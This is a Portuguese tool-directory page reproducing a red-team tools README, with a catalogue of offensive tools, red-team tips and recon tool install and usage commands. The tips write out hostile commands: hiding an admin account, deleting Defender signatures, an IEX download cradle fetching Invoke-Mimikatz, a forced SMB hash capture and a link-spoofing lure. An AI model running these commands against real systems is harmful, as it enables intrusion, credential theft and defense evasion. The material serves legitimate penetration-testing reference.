Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
RedTeam-Tools — Ferramentas e Técnicas para Red Team / Testes de Penetração | Kitploit
Ferramentas/GitHubGitHub/a-poc/redteam-tools
OSINT (Inteligência de Fontes Abertas)Escalada de PrivilégiosReconhecimentoExploraçãoMovimento LateralPós-ExploraçãoPhishingTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads
GitHuba-poc/redteam-tools

RedTeam-Tools

9.6k1.3khá 4 mesesRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Ferramentas e Técnicas para Red Team / Testes de Penetração

Ver Repositório

RedTeam-Tools

Este repositório do GitHub contém uma coleção de 150+ ferramentas e recursos que podem ser úteis para atividades de red teaming.

Algumas das ferramentas podem ser especificamente projetadas para red teaming, enquanto outras são de uso geral e podem ser adaptadas para um contexto de red teaming.

🔗 Se você é um Blue Teamer, confira BlueTeam-Tools

Aviso

Os materiais neste repositório são apenas para fins informativos e educacionais. Não se destinam ao uso em atividades ilegais.

Nota

Ocultar os cabeçalhos da lista de ferramentas com a seta.

Clique em 🔙 para voltar à lista.

Lista de Ferramentas

Dicas de Red Team 19 dicas
    • Improved HTML smuggling with mouse move eventlistener @pr0xylife
    • Google translate for phishing @malmoeb
    • Hiding the local admin account @Alh4zr3d
    • Cripple windows defender by deleting signatures @Alh4zr3d
    • Enable multiple RDP sessions per user @Alh4zr3d
    • Sysinternals PsExec.exe local alternative @GuhnooPlusLinux
    • Live off the land port scanner @Alh4zr3d
    • Proxy aware PowerShell DownloadString @Alh4zr3d
    • Looking for internal endpoints in browser bookmarks @Alh4zr3d
    • Query DNS records for enumeration @Alh4zr3d
    • Unquoted service paths without PowerUp @Alh4zr3d
    • Bypass a disabled command prompt with /k Martin Sohn Christensen
    • Stop windows defender deleting mimikatz.exe @GuhnooPlusLinux
    • Check if you are in a virtual machine @dmcxblue
    • Enumerate AppLocker rules @Alh4zr3d
    • CMD shortcut with 6 pixels via mspaint PenTestPartners
    • Link spoofing with PreventDefault JavaScript method
    • Check SMB firewall rules with Responder @malmoeb
    • Disable AV with SysInternals PsSuspend @0gtweet
Reconhecimento 24 ferramentas
    • spiderfoot Mapeamento automatizado de OSINT e superfície de ataque
    • reconftw Ferramenta automatizada de reconhecimento de subdomínios e vulnerabilidades
    • subzy Verificador de vulnerabilidade de takeover de subdomínio
    • smtp-user-enum Enumeração de usuários SMTP
    • crt.sh -> httprobe -> EyeWitness Captura de tela automatizada de domínios
    • jsendpoints Extrair links DOM da página
    • nuclei Scanner de vulnerabilidades
    • certSniff Farejador de palavras-chave em logs de transparência de certificados
    • gobuster Força bruta de caminhos de site
    • feroxbuster Ferramenta rápida de descoberta de conteúdo escrita em Rust
    • CloudBrute Força bruta em infraestrutura em nuvem
    • dnsrecon Enumerar registros DNS
    • Shodan.io Base de conhecimento de sistemas públicos
    • AORT (All in One Recon Tool) Enumeração de subdomínios
    • spoofcheck Verificador de registros SPF/DMARC
    • AWSBucketDump Enumeração de buckets S3
    • GitHarvester Buscador de credenciais no GitHub
    • truffleHog Scanner de credenciais no GitHub
    • Dismap Descoberta/identificação de ativos
    • enum4linux Enumeração Windows/samba
Desenvolvimento de Recursos 12 ferramentas
    • remoteinjector Injetar link de modelo remoto em documento Word
    • Chimera Ofuscação de PowerShell
    • msfvenom Criação de payloads
    • Shellter Ferramenta de injeção dinâmica de shellcode
    • Freeze Criação de payloads (contornando EDR)
    • WordSteal Roubar hashes NTML com Microsoft Word
    • NTAPI Undocumented Functions Kernel NT do Windows, Native API e drivers
    • Kernel Callback Functions APIs não documentadas do Windows
    • OffensiveVBA Técnicas de execução de código e evasão em macros do Office
    • WSH Payload WSH
    • HTA Payload HTA
    • VBA Payload VBA
Acesso Inicial 10 ferramentas
    • CredMaster Ferramenta de password spraying CredKing
    • TREVORspray Password sprayer com threading
    • evilqr Prova de conceito de phishing QRLJacking
    • CUPP Common User Passwords Profiler (CUPP)
    • Bash Bunny Ferramenta de ataque USB
    • EvilGoPhish Framework de campanhas de phishing
    • The Social-Engineer Toolkit Framework de campanhas de phishing
    • Hydra Ferramenta de força bruta
    • SquarePhish Framework de phishing OAuth/código QR
    • King Phisher Framework de campanhas de phishing
Execução 13 ferramentas
    • Responder Envenenador LLMNR, NBT-NS e MDNS
    • secretsdump Coletor remoto de hashes
    • evil-winrm Shell WinRM
    • Donut Execução de .NET em memória
    • Macro_pack Ofuscação de macros
    • PowerSploit Conjunto de scripts PowerShell
    • Rubeus Ferramenta de hack do Active Directory
    • SharpUp Identificador de vulnerabilidades do Windows
    • SQLRecon Kit de ferramentas ofensivas para MS-SQL
    • UltimateAppLockerByPassList Técnicas comuns de bypass do AppLocker
    • StarFighters Lançador Empire baseado em JavaScript e VBScript
    • demiguise Ferramenta de criptografia de HTA
    • PowerZure Framework PowerShell para avaliar segurança do Azure
Persistência 4 ferramentas
    • Impacket Conjunto de scripts Python
    • Empire Framework de pós-exploração
    • SharPersist Kit de ferramentas de persistência no Windows
    • ligolo-ng Ferramenta de tunelamento que usa uma interface TUN
Escalação de Privilégio 11 ferramentas
    • Crassus Ferramenta de descoberta de escalação de privilégio no Windows
    • LinPEAS Escalação de privilégio no Linux
    • WinPEAS Escalação de privilégio no Windows
    • linux-smart-enumeration Escalação de privilégio no Linux
    • Certify Escalação de privilégio no Active Directory
    • Get-GPPPassword Extração de senhas do Windows
    • Sherlock Ferramenta de escalação de privilégio em PowerShell
    • Watson Ferramenta de escalação de privilégio no Windows
    • ImpulsiveDLLHijack Ferramenta de sequestro de DLL
    • ADFSDump Ferramenta de dump do AD FS
    • BeRoot Projeto de escalação de privilégio multi-SO
Evasão de Defesa 8 ferramentas
    • Invoke-Obfuscation Ofuscador de scripts
    • Veil Ofuscador de payloads do Metasploit
    • SharpBlock Bypass de EDR via prevenção de execução no ponto de entrada
    • Alcatraz Ofuscador GUI de binários x64
    • Mangle Manipulação de executáveis compilados
    • AMSI Fail Snippets PowerShell que quebram ou desabilitam AMSI
    • ScareCrow Framework de criação de payloads projetado para bypass de EDR
    • moonwalk Removedor de logs do sistema Linux e timestamps do sistema de arquivos
Acesso a Credenciais 11 ferramentas
    • Mimikatz Extrator de credenciais do Windows
    • LaZagne Extrator local de senhas
    • hashcat Quebra de hashes de senhas
    • John the Ripper Quebra de hashes de senhas
    • SCOMDecrypt Ferramenta de descriptografia de credenciais SCOM
    • nanodump Criação de minidump do processo LSASS
    • eviltree Refatoração do tree para descoberta de credenciais
    • SeeYouCM-Thief Análise de arquivos de configuração de sistemas telefônicos Cisco
    • MailSniper Pesquisador de e-mails do Microsoft Exchange
    • SharpChromium Extrator de cookies, histórico e logins salvos do Chromium
    • dploot Saque remoto de DPAPI em Python
Descoberta 6 ferramentas
    • PCredz Descoberta de credenciais em PCAP/interface ao vivo
    • PingCastle Avaliador do Active Directory
    • Seatbelt Scanner local de vulnerabilidades
    • ADRecon Recon no Active Directory
    • adidnsdump Dump de DNS integrado do Active Directory
    • scavenger Ferramenta de varredura para sistemas de coleta
Movimento Lateral 12 ferramentas
    • crackmapexec Kit de ferramentas de movimento lateral no Windows/Active Directory
    • WMIOps Comandos remotos WMI
    • PowerLessShell PowerShell remoto sem PowerShell
    • PsExec Substituto leve para telnet
    • LiquidSnake Movimento lateral sem arquivos
    • Enabling RDP Comando de habilitação de RDP no Windows
    • Upgrading shell to meterpreter Melhoria de reverse shell
    • Forwarding Ports Comando de encaminhamento de porta local
    • Jenkins reverse shell Comando de shell do Jenkins
    • ADFSpoof Forjar tokens de segurança do AD FS
    • kerbrute Ferramenta para realizar força bruta de pré-autenticação Kerberos
    • Coercer Coagir um servidor Windows a autenticar
    • WMIOps Comandos remotos WMI
Coleta 3 ferramentas
    • BloodHound Visualização do Active Directory
    • Snaffler Coletor de credenciais do Active Directory
    • linWinPwn Enumeração do Active Directory e verificações de vulnerabilidade
Comando e Controle 9 ferramentas
    • Living Off Trusted Sites Project Aproveitar domínios legítimos para seu C2
    • Havoc Framework de comando e controle
    • Covenant Framework de comando e controle (.NET)
    • Merlin Framework de comando e controle (Golang)
    • Metasploit Framework Framework de comando e controle (Ruby)
    • Pupy Framework de comando e controle (Python)
    • Brute Ratel Framework de comando e controle ($$$)
    • NimPlant Implante C2 escrito em Nim
    • Hoaxshell Reverse shell PowerShell
Exfiltração 6 ferramentas
    • Dnscat2 C2 via tunelamento DNS
    • Cloakify Transformação de dados para exfiltração
    • PyExfil Prova de conceito de exfiltração de dados
    • Powershell RAT Backdoor baseado em Python
    • GD-Thief Exfiltração do Google Drive
    • goshs Servidor multi-protocolo de binário único para transferência de arquivos e exfiltração
Impacto 4 ferramentas
    • Conti Pentester Guide Leak Kit de ferramentas do grupo afiliado do ransomware Conti
    • SlowLoris Negação de serviço simples
    • usbkill Kill-switch anti-forense
    • Keytap Obter teclas pressionadas a partir do áudio da digitação

Dicas de Red Team

Aprenda com Red Teamers através de uma coleção de dicas de Red Teaming. Essas dicas abrangem uma variedade de táticas, ferramentas e metodologias para melhorar suas habilidades de red teaming.

🔙Improved HTML smuggling with mouse move eventlistener

Descrição: 'Qakbot adicionou um EventListener para movimento do mouse no anexo de HTML smuggling para anti-evasão em sandboxes; o zip não será extraído.'

Crédito: @pr0xylife

Link: Twitter

🔙Google translate for phishingDescrição: Roubo bem-sucedido de credenciais de página de phishing sendo realizado por proxy através da funcionalidade de visualização da página do Google Tradutor.

Crédito: @malmoeb

Link: Twitter

🔙Ocultando a conta de administrador local```bash

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /t REG_DWORD /v alh4zr3d /d 0 /f

root@kitploit:~
**Descrição:** *'Criar contas é arriscado ao evadir o blue, mas ao criar um administrador local, use uma feitiçaria fofa no registro para escondê-lo.'*

**Crédito:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1612913838999113728)

### [🔙](#tool-list)Debilitar o Windows Defender deletando assinaturas```bash
"%Program Files%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

Descrição: 'Um pouco bagunçado, mas se o Windows Defender está te causando uma grande dor de cabeça, em vez de desativá-lo (o que alerta o usuário), você deve apenas neutralizá-lo excluindo todas as assinaturas.'

Crédito: @Alh4zr3d

Link: Twitter

🔙Habilitar múltiplas sessões RDP por usuário```bash

reg add HKLM\System\CurrentControlSet\Control\TerminalServer /v fSingleSessionPerUser /d 0 /f

root@kitploit:~
**Descrição:** *'Às vezes você quer fazer login em um host via RDP ou similar, mas seu usuário tem uma sessão ativa. Habilite múltiplas sessões por usuário.'*

**Crédito:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1609954528425558016)

### [🔙](#tool-list) Alternativa local ao Sysinternals PsExec.exe```bash
wmic.exe /node:10.1.1.1 /user:username /password:pass process call create cmd.exe /c " command "

Descrição: 'Cansado de enviar o Sysinternals PsExec.exe ao fazer movimento lateral? O Windows tem uma alternativa melhor pré-instalada. Tente esta em vez disso.'

Créditos: @GuhnooPlusLinux

Link: Twitter

🔙Scanner de portas nativo do sistema```bash

0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect(<tgt_ip>,$)) "Port $ open"} 2>$null

root@kitploit:~
**Descrição:** *'Quando possível, viva da terra em vez de enviar ferramentas para as máquinas (por várias razões). PowerShell/.NET ajuda. Ex: scanner de portas simples em Powershell.'*

**Crédito:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1605060950339588096)

### [🔙](#tool-list)Ciente de proxy PowerShell DownloadString```bash
$w=(New-Object Net.WebClient);$w.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $w.DownloadString("<url>")

Descrição: 'A maioria das grandes organizações está usando proxies web atualmente. O cradle de download padrão do PowerShell não tem ciência de proxy. Use este.'

Crédito: @Alh4zr3d

Link: Twitter

🔙Procurando endpoints internos nos favoritos do navegador```bash

type "C:\Users%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Bookmarks.bak" | findstr /c "name url" | findstr /v "type"

root@kitploit:~
**Descrição:** *'Você se surpreenderia com o que pode descobrir apenas pelos favoritos de um usuário. Por exemplo, endpoints internos aos quais eles têm acesso.'*

**Crédito:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1595488676389171200)

### [🔙](#tool-list)Consultar registros DNS para enumeração```bash
Get-DnsRecord -RecordType A -ZoneName FQDN -Server <server hostname>

Descrição: 'Enumeração é 95% do jogo. No entanto, lançar toneladas de scans para avaliar o ambiente é muito barulhento. Por que não apenas perguntar ao servidor DC/DNS por todos os registros DNS?'

Crédito: @Alh4zr3d

Link: Twitter

🔙Caminhos de serviço sem aspas sem PowerUp```bash

Get-CIMInstance -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$.StartMode -eq "Auto" -and $.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name

root@kitploit:~
**Descrição:** *'Encontrar caminhos de serviço sem aspas sem PowerUp'*

**Crédito:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1579254955554136064)

### [🔙](#tool-list)Ignorar um prompt de comando desabilitado com /k```bash
# Win+R (To bring up Run Box)
cmd.exe /k "whoami"

Descrição: 'Este prompt de comando foi desabilitado pelo seu administrador...' Geralmente pode ser visto em ambientes como PCs de quiosques, uma solução rápida e improvisada é usar /k através da caixa Executar do Windows. Isso executará o comando e depois exibirá a mensagem de restrição, permitindo a execução do comando.

Crédito: Martin Sohn Christensen

Link: Blog

🔙Impedir que o Windows Defender exclua o mimikatz.exe```bash

(new-object net.webclient).downloadstring('https://raw.githubusercontent[.]com/BC-SECURITY/Empire/main/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1')|IEX;inv

root@kitploit:~
**Descrição:** *'Você está cansado do Windows Defender excluir o mimikatz.exe? Tente isso em vez disso.'*

**Crédito:** [@GuhnooPlusLinux](https://twitter.com/GuhnooPlusLinux)

**Link:** [Twitter](https://twitter.com/GuhnooPlusLinux/status/1605629049660809216)

### [🔙](#tool-list)Verifique se você está em uma máquina virtual```bash
reg query HKLM\SYSTEM /s | findstr /S "VirtualBox VBOX VMWare"

Descrição: 'Quer saber se está em uma Máquina Virtual? Consulte as chaves do registro e descubra!!! Se algum resultado aparecer, você está em uma Máquina Virtual.'

Crédito: @dmcxblue

Link: Twitter

🔙Enumerar regras do AppLocker```

(Get-AppLockerPolicy -Local).RuleCollections

Get-ChildItem -Path HKLM:Software\Policies\Microsoft\Windows\SrpV2 -Recurse

reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Exe\

root@kitploit:~
**Descrição:** *'AppLocker pode ser um problema. Enumere para ver o quão doloroso é'*

**Crédito:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**Link:** [Twitter](https://twitter.com/alh4zr3d/status/1614706476412698624)

### [🔙](#tool-list)Atalho do CMD com 6 pixels via mspaint

![image](https://assets.kitploit.com/production/public/readmes/147/db03137fe19c2c20481ca53abc8beb4b7afadcf1d2add350ce26d37f75fdc41b.png)

1. Abra o MSPaint.exe e defina o tamanho da tela para: Largura=6 e Altura=1 pixel
2. Aumente o zoom para facilitar as tarefas a seguir
3. Usando o seletor de cores, defina os valores dos pixels (da esquerda para a direita):
    - 1º: R: 10, G: 0, B: 0
    - 2º: R: 13, G: 10, B: 13
    - 3º: R: 100, G: 109, B: 99
    - 4º: R: 120, G: 101, B: 46
    - 5º: R: 0, G: 0, B: 101
    - 6º: R: 0, G: 0, B: 0
4. Salve como Bitmap de 24 bits (*.bmp;*.dib)
5. Altere sua extensão de bmp para bat e execute.

**Descrição:** *'Um método incomum, porém eficaz, de obter um shell criando um atalho para cmd.exe desenhando certas cores no Microsoft Paint. Devido ao algoritmo de codificação usado para escrever arquivos BMP, é possível ditar dados ASCII escritos em um arquivo selecionando cuidadosamente certas cores RGB.'*

**Crédito:** [PenTestPartners](https://www.pentestpartners.com/)

**Link:** [Blog](https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/#gainingacommandshell)

### [🔙](#tool-list)Engano de link com o método JavaScript PreventDefault

![image](https://assets.kitploit.com/production/public/readmes/147/49ceb382e5692c79df8ca9b96ed0c17520b7cf7f1091b5b6c214478270c165e8.png)```html
<!DOCTYPE html>
<html>
  <head>
    <meta charset="UTF-8">
    <title>PreventDefault Example</title>
  </head>
  <body>
    <a href="https://google.com" onclick="event.preventDefault(); window.location.href = 'https://bing.com';">Go to Google</a>
  </body>
</html>

Descrição: Atores maliciosos foram observados usando esta técnica para enganar vítimas a clicar em links falsificados de downloads de malware na página. Usando o método JavaScript PreventDefault, você pode falsificar o link de hover para exibir um link legítimo google.com, mas uma vez clicado, a vítima será redirecionada para seu link malicioso bing.com. Ótimo para fazer vítimas baixarem payloads através de um site controlado.

Link: Documentação do PreventDefault

🔙Verifique as regras de firewall SMB com o Responder

image```powershell Copy-Item -Path "C:\tmp" -Destination "\<ip_running_responder>\c$"

root@kitploit:~
**Descrição:** *'Quando faço uma Avaliação de Comprometimento, frequentemente pergunto ao cliente se posso fazer uma última verificação rápida: `Copy-Item -Path "C:\tmp\" -Destination "\\<ip_running_responder>\c$"`. Se o Responder conseguir capturar o hash, o firewall permite conexões SMB de saída'*

**Crédito:** [@malmoeb](https://twitter.com/malmoeb)

**Link:** [Twitter](https://twitter.com/malmoeb/status/1628272928855826433)

### [🔙](#tool-list)Desabilitar AV com SysInternals PsSuspend

![image](https://assets.kitploit.com/production/public/readmes/147/060631566db51351ace6c248b736fc8878e89ba9aaf8ad4aaf2e478183468b16.png)

**Descrição:** *Usando a ferramenta Sysinternals da Microsoft PsSuspend.exe é possível suspender alguns executáveis de serviço de AV. A ferramenta assinada pela Microsoft pode receber o PID ou Nome de um serviço em execução e suspenderá o processo via API Windows NtSuspendProcess.*

**Postagem de Blog Relacionada:** [Contornando AV via Suspensão de Processo com PsSuspend.exe](https://medium.com/@a-poc/process-suspension-with-pssuspend-exe-0cdf5d16a3b7)

**Link:** [Twitter](https://twitter.com/0gtweet/status/1638069413717975046)

Reconhecimento
====================

### [🔙](#tool-list)[spiderfoot](https://github.com/smicallef/spiderfoot)

SpiderFoot é uma ferramenta de automação de inteligência de fontes abertas (OSINT). Ela integra-se com praticamente todas as fontes de dados disponíveis e utiliza uma variedade de métodos para análise de dados, tornando esses dados fáceis de navegar.

SpiderFoot pode ser usado de forma ofensiva (por exemplo, em um exercício de red team ou teste de penetração) para reconhecimento do seu alvo ou defensivamente para coletar informações sobre o que você ou sua organização podem ter exposto na Internet.

**Instalação:**```bash
wget https://github.com/smicallef/spiderfoot/archive/v4.0.tar.gz
tar zxvf v4.0.tar.gz
cd spiderfoot-4.0
pip3 install -r requirements.txt

Para instruções completas de instalação, veja aqui.

Uso:```python python3 ./sf.py -l 127.0.0.1:5001

root@kitploit:~
Muitos vídeos tutoriais de uso [aqui](https://asciinema.org/~spiderfoot)

![spiderfoot](https://assets.kitploit.com/production/public/readmes/147/bd95a49c8707ebb8b864103b3c024971be0bfef116fecada0a5499165378da14.png)

*Imagem usada de https://github.com/smicallef/spiderfoot*

### [🔙](#tool-list)[reconftw](https://github.com/six2dez/reconftw)

reconFTW automatiza todo o processo de reconhecimento para você. Ele supera o trabalho de enumeração de subdomínios juntamente com várias verificações de vulnerabilidade e obtenção do máximo de informações sobre seu alvo.

**Instalação:**```bash
git clone https://github.com/six2dez/reconftw.git;cd reconftw/;./install.sh

Para instruções completas de instalação, veja aqui.

Uso:```bash

Single target domain

./reconftw.sh -d target.com -r

One target with multiple domains

./reconftw.sh -m target -l domains.txt -r

Passive recon

./reconftw.sh -d target.com -p

Perform all checks and exploitations

./reconftw.sh -d target.com -a

root@kitploit:~
Para instruções completas de uso, veja [aqui](https://github.com/six2dez/reconftw/wiki/2.-Usage-Guide).

![reconftw](https://assets.kitploit.com/production/public/readmes/147/319a1191b403d8b616058e77f696f9b2802b59607cc7e908a38e61a8de99a25e.png)

*Imagem utilizada de https://www.youtube.com/watch?v=TQmDAtkD1Wo*

### [🔙](#tool-list)[subzy](https://github.com/PentestPad/subzy)

Ferramenta de subdomain takeover que funciona com base na correspondência de fingerprints de resposta do [can-i-take-over-xyz](https://github.com/EdOverflow/can-i-take-over-xyz/blob/master/README.md).

**Instalação:**```bash
go install -v github.com/PentestPad/subzy@latest

Para instruções completas de instalação veja aqui.

Uso:```bash

List of subdomains

./subzy run --targets list.txt

Single or multiple targets

./subzy run --target test.google.com ./subzy run --target test.google.com,https://test.yahoo.com

root@kitploit:~
![subzy](https://assets.kitploit.com/production/public/readmes/147/cb8d580bf7a8b0647632d14dda58e9f350703db0fa10ef16cfdc04464520c063.jpg)

*Imagem utilizada de https://www.geeksforgeeks.org/subzy-subdomain-takeover-vulnerability-checker-tool/*

### [🔙](#tool-list)[smtp-user-enum](https://github.com/cytopia/smtp-user-enum)

Enumeração de usuários SMTP via VRFY, EXPN e RCPT com funcionalidade inteligente de timeout, repetição e reconexão.

**Instalação:**```bash
pip install smtp-user-enum

Uso:```bash smtp-user-enum [options] -u/-U host port smtp-user-enum --help smtp-user-enum --version

root@kitploit:~
![smtp-user-enum](https://assets.kitploit.com/production/public/readmes/147/d5d973253dfaa7e98d497954d59b83f166ba7b3807d24714a6ac40189fbdc15e.png)

*Imagem usada de https://www.kali.org/tools/smtp-user-enum/*

### [🔙](#tool-list)crt.sh -> httprobe -> EyeWitness

Eu montei um one-liner bash que: 
- Coleta passivamente uma lista de subdomínios de associações de certificados ([crt.sh](https://crt.sh/))
- Ativamente requisita cada subdomínio para verificar sua existência ([httprobe](https://github.com/tomnomnom/httprobe))
- Ativamente tira screenshots de cada subdomínio para revisão manual ([EyeWitness](https://github.com/FortyNorthSecurity/EyeWitness))

**Uso:**```bash
domain=DOMAIN_COM;rand=$RANDOM;curl -fsSL "https://crt.sh/?q=${domain}" | pup 'td text{}' | grep "${domain}" | sort -n | uniq | httprobe > /tmp/enum_tmp_${rand}.txt; python3 /usr/share/eyewitness/EyeWitness.py -f /tmp/enum_tmp_${rand}.txt --web

Nota: Você deve ter httprobe, pup e EyeWitness instalados e alterar 'DOMAIN_COM' para o domínio alvo. Você pode executar este script simultaneamente em janelas de terminal se tiver múltiplos domínios raiz alvo

image

image

🔙jsendpoints

Um bookmarklet JavaScript para extrair todos os links de endpoints de uma página web.

Criado por @renniepak, este trecho de código JavaScript pode ser usado para extrair todos os endpoints (começando com /) do DOM da página web atual, incluindo todas as fontes de script externas embutidas na página.```javascript javascript:(function(){var scripts=document.getElementsByTagName("script"),regex=/(?<=("|'|`))/[a-zA-Z0-9_?&=/-#.]*(?=("|'|`))/g;const results=new Set;for(var i=0;i<scripts.length;i++){var t=scripts[i].src;""!=t&&fetch(t).then(function(t){return t.text()}).then(function(t){var e=t.matchAll(regex);for(let r of e)results.add(r[0])}).catch(function(t){console.log("An error occurred: ",t)})}var pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const match of matches)results.add(match[0]);function writeResults(){results.forEach(function(t){document.write(t+"
")})}setTimeout(writeResults,3e3);})();

root@kitploit:~
**Uso (Bookmarklet)** 

Crie um bookmarklet...

- `Clique com o botão direito na sua barra de favoritos`
- `Clique em 'Adicionar Página'`
- `Cole o Javascript acima na caixa 'url'`
- `Clique em 'Salvar'`

...então visite a página alvo no navegador e clique no bookmarklet.

![image](https://assets.kitploit.com/production/public/readmes/147/a2a9b8ff2cacdcf419b64a6d99075dffa73471eea1201fb9a0a6b2524794849f.png)

**Uso (Console)** 

Cole o Javascript acima na janela do console `F12` e pressione Enter.

![image](https://assets.kitploit.com/production/public/readmes/147/5dd2a02f0f6874c521b8a98f35f653b1cf1a13b00a4c7e3eaf7c111700c0cc8a.png)

### [🔙](#tool-list)[nuclei](https://github.com/projectdiscovery/nuclei)

Scanner rápido de vulnerabilidades que usa modelos .yaml para buscar problemas específicos.

**Instalação:**```bash
go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest

Uso:```bash cat domains.txt | nuclei -t /PATH/nuclei-templates/

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/a747b7be6260c2a228ac90ac4c3500debb25dd3bf1f635c5ce736159cdd7bc81.png)

### [🔙](#tool-list)[certSniff](https://github.com/A-poc/certSniff)

certSniff é um observador de palavras-chave de logs de Transparência de Certificados que escrevi em Python. Ele usa a biblioteca certstream para monitorar logs de criação de certificados que contenham palavras-chave, definidas em um arquivo.

Você pode configurá-lo para executar com várias palavras-chave relacionadas ao seu domínio alvo; quaisquer criações de certificados serão registradas e podem levar à descoberta de domínios que você desconhecia anteriormente.

**Instalação:**```bash
git clone https://github.com/A-poc/certSniff;cd certSniff/;pip install -r requirements.txt

Uso:```python python3 certSniff.py -f example.txt

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/61dca92ec35e9bafb2004f44e045f4fa02fb05263456ac447c323e7becb3cbc3.png)

### [🔙](#tool-list)[gobuster](https://www.kali.org/tools/gobuster/)

Ferramenta útil para força bruta de caminhos de arquivos/pastas em um site alvo.

**Instalação:**```bash
sudo apt install gobuster

Uso:```bash gobuster dir -u "https://google.com" -w /usr/share/wordlists/dirb/big.txt --wildcard -b 301,401,403,404,500 -t 20

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/49bbb3fa465f423a5b3fa1dbe2468cb9c70ad4600532825a759da5b911a2c890.png)

### [🔙](#tool-list)[feroxbuster](https://github.com/epi052/feroxbuster)

Uma ferramenta projetada para realizar Navegação Forçada, um ataque cujo objetivo é enumerar e acessar recursos que não são referenciados pela aplicação web, mas ainda assim são acessíveis por um invasor.

O Feroxbuster usa força bruta combinada com uma wordlist para buscar conteúdo não vinculado em diretórios alvo. Esses recursos podem armazenar informações confidenciais sobre aplicações web e sistemas operacionais, como código-fonte, credenciais, endereçamento de rede interna, etc...

**Instalação: (Kali)**```bash
sudo apt update && sudo apt install -y feroxbuster

Instalar: (Mac)```bash curl -sL https://raw.githubusercontent.com/epi052/feroxbuster/master/install-nix.sh | bash

root@kitploit:~
**Instalação: (Windows)**```bash
Invoke-WebRequest https://github.com/epi052/feroxbuster/releases/latest/download/x86_64-windows-feroxbuster.exe.zip -OutFile feroxbuster.zip
Expand-Archive .\feroxbuster.zip
.\feroxbuster\feroxbuster.exe -V

Para instruções completas de instalação, veja here.

Uso:```bash

Add .pdf, .js, .html, .php, .txt, .json, and .docx to each url

./feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx

Scan with headers

./feroxbuster -u http://127.1 -H Accept:application/json "Authorization: Bearer {token}"

Read URLs from stdin

cat targets | ./feroxbuster --stdin --silent -s 200 301 302 --redirects -x js | fff -s 200 -o js-files

Proxy requests through burpsuite

./feroxbuster -u http://127.1 --insecure --proxy http://127.0.0.1:8080

root@kitploit:~
Exemplos completos de uso podem ser encontrados [aqui](https://epi052.github.io/feroxbuster-docs/docs/examples/).

![imagem](https://assets.kitploit.com/production/public/readmes/147/bddd1a012eb92f79a03b1f6dd3cb9f31a9b0751776541044adcf234332421a08.png)

*Imagem usada de https://raw.githubusercontent.com/epi052/feroxbuster/main/img/demo.gif*

### [🔙](#tool-list)[CloudBrute](https://github.com/0xsha/CloudBrute)

Uma ferramenta para encontrar a infraestrutura, arquivos e aplicativos de uma empresa (alvo) nos principais provedores de nuvem (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode).

Características:

- Detecção de nuvem (API IPINFO e Código Fonte)
- Rápido (concorrente)
- Multiplataforma (windows, linux, mac)
- Randomização de User-Agent
- Randomização de Proxy (HTTP, Socks5)

**Instalação:** 

Baixe a versão mais recente [aqui](https://github.com/0xsha/CloudBrute/releases) para seu sistema e siga as instruções de uso.

**Uso:**```bash
# Specified target, generate keywords based off 'target', 80 threads with a timeout of 10, wordlist 'storage_small.txt'
CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt"

# Output results to file
CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt

image

Imagem utilizada de https://github.com/0xsha/CloudBrute

🔙dnsrecon

dnsrecon é uma ferramenta pyhton para enumeração de registros DNS (MX, SOA, NS, A, AAAA, SPF e TXT) e pode fornecer uma série de novos hosts vítimas associados para pivoteamento a partir de uma única pesquisa de domínio.

Instalação:```bash sudo apt install dnsrecon

root@kitploit:~
**Uso:**```bash
dnsrecon -d google.com

imagem

🔙shodan.io

Shodan analisa a infraestrutura pública e a exibe em um formato pesquisável. Usando um nome de empresa, nome de domínio ou endereço IP, é possível descobrir sistemas potencialmente vulneráveis relacionados ao seu alvo através do shodan.

imagem

🔙AORT

Ferramenta para enumeração de subdomínios, enumeração de DNS, detecção de WAF, WHOIS, varredura de portas, wayback machine, coleta de e-mails.

Instalação:```bash git clone https://github.com/D3Ext/AORT; cd AORT; pip3 install -r requirements.txt

root@kitploit:~
**Uso:**```python
